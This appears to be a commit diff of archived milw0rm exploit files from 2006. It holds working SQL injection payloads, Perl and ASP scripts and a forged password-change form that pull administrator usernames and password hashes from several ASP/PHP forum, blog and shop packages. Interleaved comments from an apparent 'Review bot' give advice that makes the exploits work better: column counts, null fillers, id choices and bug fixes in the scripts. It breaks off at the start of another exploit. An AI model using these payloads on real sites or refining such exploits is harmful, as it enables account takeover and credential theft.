## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## ##
################################################################################
##########################################################################################################################################################
#Username : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_user,null,null,null,null,null,null,null,null FROM adminlogins #
##########################################################################################################################################################
##########################################################################################################################################################
#Password : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_pass,null,null,null,null,null,null,null,null FROM adminlogins #
##########################################################################################################################################################
################################################################
#Admin Panel : http://www.target.com/path/theadmin/default.asp #
################################################################
# milw0rm.com [2006-09-05]
################################################################################
## ##
## ©ZIXForum 1.12 <= "RepId" Remote SQL Injection ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## Credit by | Chironex Fleckeri ##
## Mail | ChironeX.FleckeriX@Gmail.Com ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## ##
################################################################################
##########################################################################################################################################################
#Username : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_user,null,null,null,null,null,null,null,null FROM adminlogins #
##########################################################################################################################################################
##########################################################################################################################################################
#Password : http://www.target.com/path/ReplyNew.asp?RepId=-1 UNION SELECT null,null,null,J_pass,null,null,null,null,null,null,null,null FROM adminlogins #
##########################################################################################################################################################
################################################################
#Admin Panel : http://www.target.com/path/theadmin/default.asp #
################################################################
# milw0rm.com [2006-09-05]


@ -1,13 +1,13 @@
# BiyoSecurity.Org
# script name : TualBLOG v 1.0
# Risk : High
# Regards : Dj ReMix
# Thanks : Korsan , Liz0zim
# Vulnerable file : icerik.asp
exp :
http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1
uyeno = 1 or 2( Admin ID )
# milw0rm.com [2006-09-13]
# BiyoSecurity.Org
# script name : TualBLOG v 1.0
# Risk : High
# Regards : Dj ReMix
# Thanks : Korsan , Liz0zim
# Vulnerable file : icerik.asp
exp :
http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1
uyeno = 1 or 2( Admin ID )
# milw0rm.com [2006-09-13]


@ -1,21 +1,21 @@
Vulnerability Report
*******************************************************************************
# Title : Q-Shop v3.5(browse.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Script Page : http://quadcomm.com
# Exploit;
*******************************************************************************
###http://[target]/[path]/browse.asp?cat=42&ManuID=&OrderBy=[SQL HERE]
Example:
browse.asp?cat=42&ManuID=&OrderBy=1%20union%20select%200,mail,0,pwd,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users
# ajann,Turkey
# ...
# milw0rm.com [2006-09-17]
Vulnerability Report
*******************************************************************************
# Title : Q-Shop v3.5(browse.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Script Page : http://quadcomm.com
# Exploit;
*******************************************************************************
###http://[target]/[path]/browse.asp?cat=42&ManuID=&OrderBy=[SQL HERE]
Example:
browse.asp?cat=42&ManuID=&OrderBy=1%20union%20select%200,mail,0,pwd,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users
# ajann,Turkey
# ...
# milw0rm.com [2006-09-17]
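Review bot: the `Example:` line drops the `http://[target]/[path]/` prefix shown in the template line two lines above it, so the reader has to reassemble the URL; give the full URL in the example. The injection point is the `OrderBy` parameter, so the value lands after `ORDER BY`, and the payload appends `union select 0,mail,0,pwd,0,...` with 31 columns; a one-line note on how the 31-column count was derived and which two positions browse.asp actually renders would save users trial and error. As with the other files in this commit, both sides of the hunk are identical, so this is a whitespace or line-ending change only.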

View file

@ -1,28 +1,28 @@
*******************************************************************************
# Title : Techno Dreams FAQ Manager Package v1.0(faqview.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Dork : faqview.asp?key
# Script Page : http://www.t-dreams.com
# Exploit;
*******************************************************************************
###http://[target]/[path]/faqview.asp?key=[SQL HERE]
Example:
//faqview.asp?key=-1%20union%20select%200,0,username,password,0%20from%20admin
//faqview.asp?key=-1%20union%20select%200,0,0,username,password,0%20from%20admin
With admin username and password take it,after join to login page:
../[path]/admin/
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-09-17]
*******************************************************************************
# Title : Techno Dreams FAQ Manager Package v1.0(faqview.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Dork : faqview.asp?key
# Script Page : http://www.t-dreams.com
# Exploit;
*******************************************************************************
###http://[target]/[path]/faqview.asp?key=[SQL HERE]
Example:
//faqview.asp?key=-1%20union%20select%200,0,username,password,0%20from%20admin
//faqview.asp?key=-1%20union%20select%200,0,0,username,password,0%20from%20admin
With admin username and password take it,after join to login page:
../[path]/admin/
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-09-17]
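Review bot: the two example payloads differ only in column count (`0,0,username,password,0` with five columns and `0,0,0,username,password,0` with six), but nothing says which applies to which installation or that the second is the fallback when the first errors; one sentence stating that would avoid confusion. The line `With admin username and password take it,after join to login page:` is hard to parse and means "log in at ../[path]/admin/ with the recovered credentials". Both sides of the hunk are identical, so this is a whitespace-only change.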

View file

@ -1,23 +1,23 @@
*******************************************************************************
# Title : Articles&Papers Package <=v2.0(ArticlesTableview.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Script Page : http://www.t-dreams.com
# Exploit;
*******************************************************************************
###http://[target]/[path]/ArticlesTableview.asp?key='[SQL HERE]
Example:
ArticlesTableview.asp?key=-1%20union%20select%200,0,0,0,userpassword,username,0,0,0,0,0,0,0,0%20from%20articlesusers%20where%20userid=18
Pls UserID Change(1,2,3,4,5.....)
# ajann,Turkey
# ...
# Im not [Turkish]Hacker!
# milw0rm.com [2006-09-17]
*******************************************************************************
# Title : Articles&Papers Package <=v2.0(ArticlesTableview.asp) Remote SQL Injection Vulnerability
# Author : ajann
# Script Page : http://www.t-dreams.com
# Exploit;
*******************************************************************************
###http://[target]/[path]/ArticlesTableview.asp?key='[SQL HERE]
Example:
ArticlesTableview.asp?key=-1%20union%20select%200,0,0,0,userpassword,username,0,0,0,0,0,0,0,0%20from%20articlesusers%20where%20userid=18
Pls UserID Change(1,2,3,4,5.....)
# ajann,Turkey
# ...
# Im not [Turkish]Hacker!
# milw0rm.com [2006-09-17]
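Review bot: the template `ArticlesTableview.asp?key='[SQL HERE]` opens a string literal with a quote, but the example `key=-1%20union%20select%20...` injects into a numeric context with no quote, and the template's quote would leave an unbalanced `'` in the query; make the two agree. The `where%20userid=18` filter together with `Pls UserID Change(1,2,3,4,5.....)` would read better as "userid selects which account's username/userpassword pair is returned; try low ids for the administrator". Identical old and new sides: whitespace or line-ending change only.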

View file

@ -1,18 +1,18 @@
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ Tekman Portal v1.0 (tr) SQL Injection Vulnerability +
+ Author : Fix TR +
+ Site : www.hack.gen.tr +
+ Contact : fixtr[at]bsdmail.com +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ Download: http://www.aspindir.com/goster/4425
+ Version : 1.0
+ Bug In : uye_profil.asp
+ Risk : High
+ Exp.
http://[Target]/[Path]/uye_profil.asp?uye_id=1+union+select+1,kadi,null,seviye,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+uyeler+Where+seviye+like+2
# milw0rm.com [2006-09-19]
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ Tekman Portal v1.0 (tr) SQL Injection Vulnerability +
+ Author : Fix TR +
+ Site : www.hack.gen.tr +
+ Contact : fixtr[at]bsdmail.com +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ Download: http://www.aspindir.com/goster/4425
+ Version : 1.0
+ Bug In : uye_profil.asp
+ Risk : High
+ Exp.
http://[Target]/[Path]/uye_profil.asp?uye_id=1+union+select+1,kadi,null,seviye,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null+from+uyeler+Where+seviye+like+2
# milw0rm.com [2006-09-19]
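Review bot: the payload uses `uye_id=1+union+select+...`, i.e. a valid profile id rather than a non-matching one such as the `-1` the other entries in this commit use, so the real profile row is returned first and the injected row second; if uye_profil.asp renders only the first record, the UNION row is never shown. The `Where+seviye+like+2` clause filters on the `seviye` column (also selected into the fourth slot) being 2, which the text should explain is the privilege level being targeted if that is the intent. Identical old and new sides: whitespace-only change.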

View file

@ -1,11 +1,11 @@
# xweblog <= 2.1 (tr) (kategori.asp)Remote SQL Injection Vulnerability
# Author : Muhacir
# Source : http://www.aspindir.com/goster/4386
# Exploit : http://www.victim.com/[xweblog path]/kategori.asp?kategori=-1%20union%20select%200,ad,2,3,4,5,6,7,8,9,sifre,11,12%20from%20uyeler
# Greetz To : str0ke :)
# milw0rm.com [2006-09-22]
# xweblog <= 2.1 (tr) (kategori.asp)Remote SQL Injection Vulnerability
# Author : Muhacir
# Source : http://www.aspindir.com/goster/4386
# Exploit : http://www.victim.com/[xweblog path]/kategori.asp?kategori=-1%20union%20select%200,ad,2,3,4,5,6,7,8,9,sifre,11,12%20from%20uyeler
# Greetz To : str0ke :)
# milw0rm.com [2006-09-22]
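Review bot: the payload `kategori=-1%20union%20select%200,ad,2,3,4,5,6,7,8,9,sifre,11,12%20from%20uyeler` uses integer literals as fillers around the `ad` and `sifre` text columns; on SQL Server (as opposed to Access) a UNION that puts an integer under a text column forces a conversion and can fail, whereas `null` fillers, as the Tekman and iyzi entries in this commit use, are type-neutral. Identical old and new sides: whitespace-only change.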

View file

@ -1,46 +1,46 @@
#!usr/bin/perl
#Author : gega
#Google : "Spidey Blog Script (c) v1.5"
#SpideyBlog 1.5 Sql Injection Exploit
#Author Mail : gega.tr[at]gmail[dot]com
#Powered by e-hack.org
#Vulnerability by Asianeagle.
#Vulnerability Link : http://milw0rm.com/exploits/2186
use LWP::Simple;
print "\n==============================\n";
print "== Spidey Blog v1.5 ==\n";
print "== Sql Injection Exploit ==\n";
print "== Author : gega ==\n";
print "==============================\n\n";
if(!$ARGV[0] or !$ARGV[0]=~/http/ or !$ARGV[1] or ($ARGV[1] ne 'password' and $ARGV[1] ne 'nick'))
{
print "Usage : perl $0 [path] [function]\n";
print "path ==> http://www.example.com/blog/\n";
print "function ==> nick OR password\n";
print "Example : perl $0 http://site.org/blog/ nick\n";
exit(0);
}
else
{
if($ARGV[1] eq 'nick'){
$url=q[proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,kullanici_adi,6%20from%20uyeler%20where%20id%20like%201];
$page=get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page=~m/<td width="100%" valign="top" height="19" colspan="3"><span class="normal_yazi">(.*?)<\/span><\/td>/ && print "[+] Username of administrator is: $1\n";
print "[-] Unable to retrieve username\n" if(!$1); }
else {
$code=q[proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201];
$page=get($ARGV[0].$code) || die "[-]Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page=~m/<td width="100%" valign="top" height="19" colspan="3"><span class="normal_yazi">(.*?)<\/span><\/td>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve password\n" if(!$1);
}
}
#To Be Or Not To Be!
# milw0rm.com [2006-09-24]
#!usr/bin/perl
#Author : gega
#Google : "Spidey Blog Script (c) v1.5"
#SpideyBlog 1.5 Sql Injection Exploit
#Author Mail : gega.tr[at]gmail[dot]com
#Powered by e-hack.org
#Vulnerability by Asianeagle.
#Vulnerability Link : http://milw0rm.com/exploits/2186
use LWP::Simple;
print "\n==============================\n";
print "== Spidey Blog v1.5 ==\n";
print "== Sql Injection Exploit ==\n";
print "== Author : gega ==\n";
print "==============================\n\n";
if(!$ARGV[0] or !$ARGV[0]=~/http/ or !$ARGV[1] or ($ARGV[1] ne 'password' and $ARGV[1] ne 'nick'))
{
print "Usage : perl $0 [path] [function]\n";
print "path ==> http://www.example.com/blog/\n";
print "function ==> nick OR password\n";
print "Example : perl $0 http://site.org/blog/ nick\n";
exit(0);
}
else
{
if($ARGV[1] eq 'nick'){
$url=q[proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,kullanici_adi,6%20from%20uyeler%20where%20id%20like%201];
$page=get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page=~m/<td width="100%" valign="top" height="19" colspan="3"><span class="normal_yazi">(.*?)<\/span><\/td>/ && print "[+] Username of administrator is: $1\n";
print "[-] Unable to retrieve username\n" if(!$1); }
else {
$code=q[proje_goster.asp?pid=-1%20union%20select%200,1,2,3,4,sifre,6%20from%20uyeler%20where%20id%20like%201];
$page=get($ARGV[0].$code) || die "[-]Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page=~m/<td width="100%" valign="top" height="19" colspan="3"><span class="normal_yazi">(.*?)<\/span><\/td>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve password\n" if(!$1);
}
}
#To Be Or Not To Be!
# milw0rm.com [2006-09-24]
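Review bot: the argument check `!$ARGV[0]=~/http/` does not do what it intends: `!` binds tighter than `=~`, so it evaluates as `(!$ARGV[0]) =~ /http/`, matching the pattern against an empty string or `1`, which never contains `http`, and the missing-scheme case is never caught; it should be `$ARGV[0] !~ /http/`. The shebang `#!usr/bin/perl` also lacks the leading slash (`#!/usr/bin/perl`), so the script only runs via an explicit `perl script.pl`. Less critical: the `nick` and `password` branches duplicate the fetch-and-regex logic with only the column (`kullanici_adi` vs `sifre`) and the label differing, and the `[-] Unable to retrieve` message relies on `$1` being unset after a failed match; one request selecting both columns, or a small hash mapping the function name to the column, would be simpler. Both sides of the hunk are identical, so the commit changes only whitespace or line endings.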

View file

@ -1,18 +1,18 @@
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ iyzi Forum s1 b2 (tr) SQL Injection Vulnerability +
+ Author : Fix TR +
+ Site : www.hack.gen.tr +
+ Contact : fixtr[at]bsdmail.com +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Download & Info: http://www.aspindir.com/Goster/2981
Bug In : uye_ayrinti.asp
Risk : High
Exp:
http://[victim]/[path]/uye/uye_ayrinti.asp?uye_nu=1+union+select+1,kullanici_adi,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null+from+iyzi_uyeler+where+editor+like+1
Password encrytped with SHA-256
# milw0rm.com [2006-09-24]
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ iyzi Forum s1 b2 (tr) SQL Injection Vulnerability +
+ Author : Fix TR +
+ Site : www.hack.gen.tr +
+ Contact : fixtr[at]bsdmail.com +
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Download & Info: http://www.aspindir.com/Goster/2981
Bug In : uye_ayrinti.asp
Risk : High
Exp:
http://[victim]/[path]/uye/uye_ayrinti.asp?uye_nu=1+union+select+1,kullanici_adi,null,null,null,null,sifre,null,null,null,null,null,null,null,null,null,null,null,null,null+from+iyzi_uyeler+where+editor+like+1
Password encrytped with SHA-256
# milw0rm.com [2006-09-24]
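Review bot: `Password encrytped with SHA-256` has a typo and the wrong term: SHA-256 is a hash, so the `sifre` value returned is a digest to be cracked offline, not something to decrypt. As in the Tekman entry by the same author, `uye_nu=1+union+select+...` uses an existing member id rather than a non-matching one, so the real record is returned ahead of the injected row; `-1` would make the UNION row the only result. `where+editor+like+1` restricts the result to rows with `editor` set to 1, which the text should say is the moderator/admin flag if that is the intent. Identical old and new sides: whitespace-only change.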

View file

@ -1,38 +1,38 @@
<!--
# Title : Active Bulletin Board v1.1 beta2 (doprofiledit.asp) Remote User Pass Change Exploit
# Author : ajann
# Dork : "Forum Active Bulletin Board version 1.1 béta 2"
# Greetz : Ramazan'iniz,Mübarek,Olsun,Tüm,Müslüman,Alemi|Geç,Oldu,Biraz :)
[Code]]]
-->
<html>
<body bgcolor="#000000">
<form method="POST" action="http://www.somesite.com/forum/doprofiledit.asp"><p><b>
<font color="#FF0000" face="Verdana" size="2">Email: </font></b>
<input type="text" name="Email" size="30" value="ajann@ajann.com"><br>
<font face="Verdana" size="2"><b><font color="#FF0000">Password:</font>:</b></font>
<input type="text" name="Passe" size="30" value="123456"> <br>
<input type="submit" value="Submit" name="Envoyer">
<input type="reset" value="Cancel" name="Effacer">
<input type="hidden" name="Id" value="42">
<input type="hidden" name="Nom" value="Administrateur"></p>
</form>
</body>
</html>
<!--
[/Code]]]
Change: <input type="hidden" name="Id" value="42"> => ID
Change: <input type="hidden" name="Nom" value="Administrateur"> => UsrName
Next to admin.asp
#ajann,Turkey
#...
#Im Not Hacker!
-->
# milw0rm.com [2006-10-18]
<!--
# Title : Active Bulletin Board v1.1 beta2 (doprofiledit.asp) Remote User Pass Change Exploit
# Author : ajann
# Dork : "Forum Active Bulletin Board version 1.1 béta 2"
# Greetz : Ramazan'iniz,Mübarek,Olsun,Tüm,Müslüman,Alemi|Geç,Oldu,Biraz :)
[Code]]]
-->
<html>
<body bgcolor="#000000">
<form method="POST" action="http://www.somesite.com/forum/doprofiledit.asp"><p><b>
<font color="#FF0000" face="Verdana" size="2">Email: </font></b>
<input type="text" name="Email" size="30" value="ajann@ajann.com"><br>
<font face="Verdana" size="2"><b><font color="#FF0000">Password:</font>:</b></font>
<input type="text" name="Passe" size="30" value="123456"> <br>
<input type="submit" value="Submit" name="Envoyer">
<input type="reset" value="Cancel" name="Effacer">
<input type="hidden" name="Id" value="42">
<input type="hidden" name="Nom" value="Administrateur"></p>
</form>
</body>
</html>
<!--
[/Code]]]
Change: <input type="hidden" name="Id" value="42"> => ID
Change: <input type="hidden" name="Nom" value="Administrateur"> => UsrName
Next to admin.asp
#ajann,Turkey
#...
#Im Not Hacker!
-->
# milw0rm.com [2006-10-18]
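Review bot: the form posts `Email` and `Passe` together with the hidden `Id` and `Nom` fields and no session or current-password field, so the exploit relies on doprofiledit.asp accepting a client-supplied `Id` with no ownership check; the usage notes `Change: <input type="hidden" name="Id" value="42"> => ID` and `... name="Nom" value="Administrateur"> => UsrName` should say whether `Nom` must match the target account's existing username or is itself overwritten, since that decides what the attacker needs to know in advance. `Next to admin.asp` presumably means "then log in at admin.asp with the new password"; spell it out. Identical old and new sides: whitespace-only change.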

View file

@ -1,189 +1,189 @@
<% Response.Buffer = True %>
<% On Error Resume Next %>
<% Server.ScriptTimeout = 100 %>
<%
'===============================================================================================
'[Script Name: Berty Forum <= 1.4(index.php) Remote Blind SQL Injection Exploit
'[Coded by : ajann
'[Author : ajann
'[Contact : :(
'[ExploitName: exploit1.asp
'[Greetz To: ## Tüm Müslüman Aleminin Ramazan Bayrami MUBAREK Olsun , Bir Daha Nasib Olur Ýnsallah ##
'[Note : exploit file name =>exploit1.asp
'[Using : Write Target and ID after Submit Click
'===============================================================================================
%>
<html>
<title>Berty Forum v1.4(index.php) Blind SQL Injection Exploit</title>
<head>
<script language="JavaScript">
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'
}
}
function write(){
setTimeout("writetext()",1000);
}
</script>
</head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
<center>
<font face="Verdana" size="2" color="#008000"><b><a href="exploit1.asp">Berty Forum &lt;=</b>v1.4(index.php) <u><b>
Blind SQL Injection Exploit</b></u></a></font><br><br>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User
ID=1]</b></font></td>
<td width="50%"><center>
<form method="post" name="form1" action="exploit1.asp?islem=get">
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="1" size="25" style="background-color: #808080">
<input type="submit" value="Get"></center></td>
</tr>
</table>
<div id=htmlAlani></div>
<%
islem = Request.QueryString("islem")
If islem = "hata1" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
End If
If islem = "hata2" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
End If
If islem = "hata3" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
End If
%>
<%
If islem = "get" Then
string1="/index.php?consult=1&indMemo="
string2="-1%20union select%20"
string3="mdp%20"
string4="from%20"
string5="membre%20"
string6="where%20"
string7="ind like%20"
string8=Request.Form("id")
string9="/index.php?consult=1&indMemo="
string10="-1%20union select%20"
string11="nom%20"
string12="from%20"
string13="membre%20"
string14="where%20"
string15="ind like%20"
string16=Request.Form("id")
targettext = Request.Form("text1")
arama=InStr(1, targettext, "union" ,1)
arama2=InStr(1, targettext, "http://" ,1)
If targettext="" Then
Response.Redirect("exploit1.asp?islem=hata1")
Else
If arama>0 then
Response.Redirect("exploit1.asp?islem=hata2")
Else
If arama2=0 then
Response.Redirect("exploit1.asp?islem=hata3")
Else
%>
<%
target1 = targettext+string1+string2+string3+string4+string5+string6+string7+string8
target2 = targettext+string9+string10+string11+string12+string13+string14+string15+string16
Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake
.Open "GET" , come, FALSE
.sEnd
take = .Responsetext
End With
SET objtake = Nothing
End Function
get_username = take(target1)
get_password = take(target2)
getdata=InStr(get_username,"""720"" valign=""top"">" )
username=Mid(get_username,getdata+19,20)
passwd=Mid(get_password,getdata+19,20)
%>
<center>
<font face="Verdana" size="2" color="#008000"> <u><b>
ajann<br></b></u></font>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<b><font size="2" face="Arial">User Name:</font></b></td>
<td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></font></b></td>
</tr>
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<b><font size="2" face="Arial">&nbsp;User Password:</font></b></td>
<td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=passwd%></font></b></td>
</tr>
</table>
<form method="POST" name="form2" action="#">
<input type="hidden" name="field1" size="20" value="<%=passwd%>"></p>
</form>
</center>
<script language="JavaScript">
write()
functionControl1()
</script>
</body>
</html>
<%
End If
End If
End If
End If
Set objtake = Nothing
%>
# milw0rm.com [2006-10-24]
<% Response.Buffer = True %>
<% On Error Resume Next %>
<% Server.ScriptTimeout = 100 %>
<%
'===============================================================================================
'[Script Name: Berty Forum <= 1.4(index.php) Remote Blind SQL Injection Exploit
'[Coded by : ajann
'[Author : ajann
'[Contact : :(
'[ExploitName: exploit1.asp
'[Greetz To: ## Tüm Müslüman Aleminin Ramazan Bayrami MUBAREK Olsun , Bir Daha Nasib Olur Ýnsallah ##
'[Note : exploit file name =>exploit1.asp
'[Using : Write Target and ID after Submit Click
'===============================================================================================
%>
<html>
<title>Berty Forum v1.4(index.php) Blind SQL Injection Exploit</title>
<head>
<script language="JavaScript">
function functionControl1(){
setTimeout("functionControl2()",2000);
}
function functionControl2(){
if(document.form1.field1.value==""){
alert("[Exploit Failed]=>The Username and Password Didnt Take,Try Again");
}
}
function writetext() {
if(document.form1.field1.value==""){
document.getElementById('htmlAlani').innerHTML='<font face=\"Verdana\" size=\"1\" color=\"#008000\">There is a problem... The Data Didn\'t Take </font>'
}
}
function write(){
setTimeout("writetext()",1000);
}
</script>
</head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<body bgcolor="#000000" link="#008000" vlink="#008000" alink="#008000">
<center>
<font face="Verdana" size="2" color="#008000"><b><a href="exploit1.asp">Berty Forum &lt;=</b>v1.4(index.php) <u><b>
Blind SQL Injection Exploit</b></u></a></font><br><br>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">
<font face="Arial" size="1"><b><font color="#FFFFFF">TARGET:</font>Example:[http://x.com/path]</b></font><p>
<b><font face="Arial" size="1" color="#FFFFFF">USER ID:</font></b><font face="Arial" size="1"><b>Example:[User
ID=1]</b></font></td>
<td width="50%"><center>
<form method="post" name="form1" action="exploit1.asp?islem=get">
<input type="text" name="text1" value="http://" size="25" style="background-color: #808080"><br><input type="text" name="id" value="1" size="25" style="background-color: #808080">
<input type="submit" value="Get"></center></td>
</tr>
</table>
<div id=htmlAlani></div>
<%
islem = Request.QueryString("islem")
If islem = "hata1" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please complete to the whole spaces</font>"
End If
If islem = "hata2" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Please right character use</font>"
End If
If islem = "hata3" Then
Response.Write "<font face=""Verdana"" size=""1"" color=""#008000"">There is a problem! Add ""http://""</font>"
End If
%>
<%
If islem = "get" Then
string1="/index.php?consult=1&indMemo="
string2="-1%20union select%20"
string3="mdp%20"
string4="from%20"
string5="membre%20"
string6="where%20"
string7="ind like%20"
string8=Request.Form("id")
string9="/index.php?consult=1&indMemo="
string10="-1%20union select%20"
string11="nom%20"
string12="from%20"
string13="membre%20"
string14="where%20"
string15="ind like%20"
string16=Request.Form("id")
targettext = Request.Form("text1")
arama=InStr(1, targettext, "union" ,1)
arama2=InStr(1, targettext, "http://" ,1)
If targettext="" Then
Response.Redirect("exploit1.asp?islem=hata1")
Else
If arama>0 then
Response.Redirect("exploit1.asp?islem=hata2")
Else
If arama2=0 then
Response.Redirect("exploit1.asp?islem=hata3")
Else
%>
<%
target1 = targettext+string1+string2+string3+string4+string5+string6+string7+string8
target2 = targettext+string9+string10+string11+string12+string13+string14+string15+string16
Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake
.Open "GET" , come, FALSE
.sEnd
take = .Responsetext
End With
SET objtake = Nothing
End Function
get_username = take(target1)
get_password = take(target2)
getdata=InStr(get_username,"""720"" valign=""top"">" )
username=Mid(get_username,getdata+19,20)
passwd=Mid(get_password,getdata+19,20)
%>
<center>
<font face="Verdana" size="2" color="#008000"> <u><b>
ajann<br></b></u></font>
<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" width="35%" id="AutoNumber1" bordercolorlight="#808080" bordercolordark="#008000" bordercolor="#808080">
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<b><font size="2" face="Arial">User Name:</font></b></td>
<td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=username%></font></b></td>
</tr>
<tr>
<td width="50%" bgcolor="#808000" onmouseover="javascript:this.style.background='#808080';" onmouseout="javascript:this.style.background='#808000';">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<b><font size="2" face="Arial">&nbsp;User Password:</font></b></td>
<td width="50%">&nbsp;<b><font color="#C0C0C0" size="2" face="Verdana"><%=passwd%></font></b></td>
</tr>
</table>
<form method="POST" name="form2" action="#">
<input type="hidden" name="field1" size="20" value="<%=passwd%>"></p>
</form>
</center>
<script language="JavaScript">
write()
functionControl1()
</script>
</body>
</html>
<%
End If
End If
End If
End If
Set objtake = Nothing
%>
# milw0rm.com [2006-10-24]
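Review bot: the two results are swapped: `target1` is built from `string3="mdp%20"` (the password column) but is stored in `get_username`, while `target2` selects `nom` (the username) into `get_password`, so the page labels the password as "User Name" and the username as "User Password"; swap either the column strings or the variable names. The offset `getdata` is computed once from the `get_username` response via `InStr(get_username,"""720"" valign=""top"">")` and then reused for `passwd=Mid(get_password,getdata+19,20)`, which only works if both responses have identical markup up to that marker, and the fixed length 20 truncates any `mdp` value longer than 20 characters (a hash would be). `On Error Resume Next` at the top hides every failure from the operator, so a bad target silently yields empty fields. Finally, the title calls this a Blind SQL Injection, but the exploit reads the UNION result straight from the response, which is an ordinary union-based injection. Both sides of the hunk are identical, so the commit changes only whitespace or line endings.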

View file

@ -1,179 +1,179 @@
<% Response.Buffer = True %>
<% On Error Resume Next %>
<% Server.ScriptTimeout = 100 %>
<%
'===============================================================================================
'[Script Name: Php League v0.82 (classement.php) Remote SQL Injection Exploit
